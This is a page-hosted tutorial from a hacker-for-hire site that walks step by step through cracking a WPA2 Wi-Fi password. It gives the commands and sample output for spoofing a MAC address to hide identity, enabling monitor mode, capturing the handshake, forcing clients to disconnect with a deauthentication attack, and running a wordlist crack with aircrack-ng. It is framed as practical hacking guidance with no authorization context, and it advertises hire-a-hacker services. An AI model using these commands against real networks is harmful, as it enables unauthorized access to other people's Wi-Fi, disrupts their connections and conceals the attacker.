Thanks to visit codestin.com
Credit goes to www.scribd.com

0% found this document useful (0 votes)
321 views4 pages

Central Hacker For Hire Wifi Hacking

Central Hacker is a ethical professional hacker website to provide real and ethically Hire a hacking service! Remove virus, Configure computer or website security!

Uploaded by

Techbin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
321 views4 pages

Central Hacker For Hire Wifi Hacking

Central Hacker is a ethical professional hacker website to provide real and ethically Hire a hacking service! Remove virus, Configure computer or website security!

Uploaded by

Techbin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

 

Article Written by: CENTRAL HACKER 

Website: https://centralhacker.com 

In this tutorial we will show you how to hack WIFI password step by step. To hack WIFI 
you need to have external wifi adapter that support monitor mode. 

1. Open terminal and look for WIFI interface 

ip addr 

2. Hide your Identity by changing the MAC address. Download the macchanger from 
https://github.com/alobbs/macchanger and do the following: 

$macchanger --random wlp7s0 

3. Now enable the monitor mode 

$airmon-ng start wlp7s0 


Found 5 processes that could cause trouble.Kill them using 'airmon-ng check kill' before putting 

the card in monitor mode, they will interfere by changing channels and sometimes putting the interface back in 
managed mode 

PID Name 

764 avahi-daemon 

787 avahi-daemon 

791 wpa_supplicant 

802 NetworkManager 

1239 dhclient 

PHY Interface Driver Chipset 

phy1 wlp7s0 ath9k Qualcomm Atheros AR9287 Wireless Network Adapter (PCI-Express) 
(rev 01) 
wlp7s0 is soft blocked, please run "rfkill unblock 1" to use this interface. rfkill error, unable to start 
wlp7s0 

Would you like to try and automatically resolve this? [y/n] y 

(mac80211 monitor mode vif enabled for [phy1]wlp7s0 on [phy1]wlp7s0mon) 

(mac80211 station mode vif disabled for [phy1]wlp7s0) 

4. Let’s see if monitor mode is enabled successfully 

$ iwconfig 
eth0 no wireless extensions. 

lo no wireless extensions. 

wlp7s0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=16 dBm   

Retry short limit:7 RTS thr:off Fragment thr:off 

Power Management:off 

So you see the Mode is Monitor. Now it is time to capture handshake to hack a wifi 
network. 

5. Now first let’s get BSSID and Channel 

$airodump-ng wlp7s0mon 

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 

B8:68:F4:28:DB:7A -41 425 85 0 7 270 WPA2 CCMP PSK CentralHacker 

6. It is time to capture the packet 

$airodump-ng --bssid B8:68:F4:28:DB:7A --channel 7 --write wifi-hack.cap wlp7s0mon 

Now We need to wait for a client to connect to the Access Point. We can do another 
thing is , forcefully disconnect a client to reconnect to the access point with following 
command: 
$aireplay-ng --deauth 6 -a B8:68:F4:28:DB:7A -c 60:AB:67:82:F3:7F wlp7s0mon 

You can stop capturing the handshake whenever you see the station connected. 

7. Now time to crack the password. To crack the password you need to have a 
good wordlist. You can search on google for good big wordlist or make one 
yourself.  

aircrack-ng wifi-hack.cap-01.cap -w 1000.txt 


Read 3960 packets. 

# BSSID ESSID Encryption 

1 B8:68:F4:28:DB:7A CentralHacker WPA (1 handshake, with PMKID) 

Choosing first network as target. 

Opening wifi-hack.cap-01.cap... 

Read 3960 packets. 

1 potential targets 

Aircrack-ng 1.5.2  

[00:00:00] 150/205 keys tested (6169.79 k/s)  

Time left: 0 seconds 73.17% 

KEY FOUND! [ StrongPassword$#2353 ] 

Hopefully, you enjoyed this article. If you want to know more about hacking and 
professional hackers Just visit our website: https://centralhacker.com . 

 
 
 
 
Thanks for Reading 
Central Hacker(https://centralhacker.com)  

You might also like